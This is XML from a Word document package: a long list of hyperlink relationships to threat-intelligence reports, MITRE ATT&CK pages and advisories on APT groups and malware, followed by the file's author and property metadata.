Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/oasis-open/cti-documentation/blob/main/examples/example_json/apt1.json" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zdnet.com/article/north-korean-hackers-launch-rokrat-trojan-in-campaigns-against-the-south/" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/alerts/aa20-239a" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/press-release/file/1084361/download" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20160503234007/https:/www.isightpartners.com/2014/10/cve-2014-4114/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-xagentosx-sofacys-xagent-macos-tool/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf%20" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0096/" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/lazarus-threatneedle/100803/" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0158" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/file/1080281/download" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcrunch.com/2020/09/16/justice-department-charges-apt41-chinese-hackers/" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.ahnlab.com/global/brochure/%5bAnalysis%5dAndariel_Group.pdf" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0512/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis/2014-06-10%20-%20Clandestine%20Fox,%20Part%20Deux.pdf" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=92a4528c-2bdb-498f-85c8-4273bfdc66aa&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcrunch.com/2020/09/16/justice-department-charges-apt41-chinese-hackers/" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20160404133736/http:/www.theguardian.com/technology/2014/sep/25/russian-malware-privateer-hackers-ukraine" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0127/" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malpedia.caad.fkie.fraunhofer.de/actor/mummy_spider" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0012/" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/meterpreter/blob/master/source/extensions/priv/server/elevate/namedpipe.c" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/china-based-threat" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/unc2452-merged-into-apt29" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attackiq.com/2022/05/10/attack-graph-response-to-us-cert-aa22-108a-north-korean-targeting-of-blockchain-companies/" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://flashpoint.io/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enigmasoftware.com/bubblewraptrojan-removal/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.ased.io/adidier/stix-schemas/-/blob/1b1b9c6b2144ef16cb9c586717100f2ac4da66d9/examples/threat-reports/apt1.json" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0193/" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/blog/apt32-targeting-chinese-government-in-covid-19-related-espionage" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/hackers-target-journalists-goldbackdoor/179389/" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/blog/targeted-attack-in-middle-east-by-apt34" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://citizenlab.ca/2018/08/familiar-feeling-a-malware-campaign-targeting-the-tibetan-diaspora-resurfaces/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/china-based-threat" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/gold-cabin" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0161/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0022/" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcrunch.com/2019/03/25/asus-update-backdoor/" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/lazarus-threatneedle/100803/" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0089/" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Emotet" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thedfirreport.com/2021/05/12/conti-ransomware/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/file/1080281/download" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/north-korean-hackers-targeting-journalists-with-novel-malware/" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0013/" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.jpcert.or.jp/en/2020/04/attacks-exploiting-vulnerabilities-in-pulse-connect-secure.html" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intezer.com/blog/malware-analysis/new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://link.springer.com/content/pdf/10.1007/978-3-030-10543-3_10.pdf" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/unit42-xagentosx-sofacys-xagent-macos-tool/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/unc2452-merged-into-apt29" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/asus-supply-chain-attack" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=V7Nb0YqX9KI" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/alerts/aa20-302a" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/wp/wp-the-spy-kittens-are-back.pdf" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://izoologic.com/2022/05/02/goldbackdoor-malware-used-by-an-apt-group-to-target-journalists/" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/operation-cobalt-kitty-apt" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/02/25140359/greatidea_A41_v1.0.pdf" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0049/" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0109/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/file/1080281/download" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.morphisec.com/asus-supply-chain-attack" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0016/" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwarebytes.com/blog/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/ta551-shathak-icedid/" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:\Users\chris\AppData\Local\Temp\MicrosoftEdgeDownloads\481777ba-fbd7-41c4-9e1d-ae9b36e3d4a6\RYUK%20Advisory%20draft%20CP%20June%202019.pdf" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0483/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://regmedia.co.uk/2014/05/14/fireeye_iran.pdf" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0007/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0161/" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securitystronghold.com/gates/gold-backdoor.html" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/blog/fin7-phishing-lnk" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0626/" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/press-release/file/1328521/download" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-poison-ivy-variant" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.vmware.com/security/2020/03/the-dukes-of-moscow.html" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://krebsonsecurity.com/2012/09/chinese-hackers-blamed-for-intrusion-at-energy-industry-giant-telvent/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mandiant/iocs" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://content.fireeye.com/apt-41/rpt-apt41" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pan-unit42/iocs/tree/master/TA5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4C26D-5470-400F-AFB0-A58A90981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281</TotalTime>
  <Pages>197</Pages>
  <Words>67072</Words>
  <Characters>382312</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>3185</Lines>
  <Paragraphs>896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maidens</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Christopher Maidens</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <cp:lastPrinted>2022-10-29T10:44:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-14T20:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-02T14:48:00Z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3dcc3285-f37c-3e00-9b39-cb124f14fc7b</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="24" name="Mendeley Citation Style_1">
    <vt:lpwstr>http://www.zotero.org/styles/apa</vt:lpwstr>
  </property>
</Properties>
</file>